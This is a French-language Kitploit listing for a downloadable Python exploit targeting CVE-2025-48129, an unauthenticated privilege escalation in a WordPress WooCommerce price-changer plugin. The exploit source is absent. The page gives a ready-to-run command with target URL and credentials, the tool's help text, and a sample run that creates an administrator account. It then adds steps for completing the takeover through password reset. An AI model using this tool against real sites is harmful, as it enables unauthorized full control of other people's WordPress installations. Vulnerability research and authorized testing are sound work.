Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-48129 — WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 est vulnérable à l'escalade de privilèges. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-48129
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentification
GitHubnxploited/cve-2025-48129

CVE-2025-48129

WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 est vulnérable à l'escalade de privilèges.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2025-48129 - Élévation de Privilèges dans le Plugin Spreadsheet Price Changer pour WordPress

🛡️ Résumé de la Vulnérabilité

  • Plugin Affecté : Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • Versions Vulnérables : <= 2.4.37
  • Version Corrigée : ❌ Aucun correctif officiel disponible
  • Découvert par : Patchstack | 20 mai 2025
  • Identifiant CVE : CVE-2025-48129
  • Score CVSS : 9.8 (Critique)
  • Priorité du Correctif : 🔴 Élevée

🔥 Risque

Des attaquants non authentifiés peuvent élever leurs privilèges en créant un compte de niveau Administrateur sans nécessiter d'accès préalable. Cela permet une prise de contrôle complète du site WordPress.

Classifié sous : OWASP A7 – Défaillances d'identification et d'authentification


🧪 Aperçu du Script d'Exploitation

Ce script Python cible les versions vulnérables du plugin et enregistre un nouvel Administrateur WordPress en utilisant uniquement une adresse email et un mot de passe (haché via MD5).


▶️ Exemple d'Utilisation

root@kitploit:~
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 Aide d'Utilisation

root@kitploit:~
python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Exploitation d'Élévation de Privilèges Non Authentifiée par Khaled Alenazi (Nxploited)

options:
  -h, --help              affiche ce message d'aide et quitte
  -u, --url URL           URL du site WordPress cible (ex. http://site.com/)
  -mail, --mail MAIL      Email pour le nouveau compte Admin
  -p, --password PASSWORD Mot de passe à définir (par défaut : nxploitadmin)

✅ Exemple de Résultat Réussi

root@kitploit:~
[*] Vérification de la version du plugin...
[*] Version du plugin : 2.4.37
[*] Version vulnérable détectée. Exploitation en cours...
[+] Exploitation réussie !

[*] Identifiants de connexion :
    Nom d'utilisateur : [email protected]
    Mot de passe : 21232f297a57a5a743894a0e4a801fc3

[*] Si la connexion échoue, réinitialisez le mot de passe manuellement via :
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ Note Importante

Dans certains cas, la connexion directe avec le mot de passe choisi peut échouer.
Ce n'est pas un bug dans l'exploit, mais le résultat de la manière dont le plugin vulnérable transmet les mots de passe hachés au système interne de création d'utilisateurs de WordPress.

Si vous ne parvenez pas à vous connecter, réinitialisez simplement le mot de passe par email en utilisant l'URL suivante :

root@kitploit:~
http://target-site.com/wordpress/wp-login.php?action=lostpassword

WordPress enverra un email de réinitialisation de mot de passe au compte Administrateur que vous venez de créer — vous accordant un accès complet.


🧾 Avis de Non-Responsabilité Légal

Cet outil est fourni uniquement à des fins éducatives et de tests de pénétration autorisés.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce script.


Par : Nxploited ( Khaled_alenazi )

Télécharger l’outil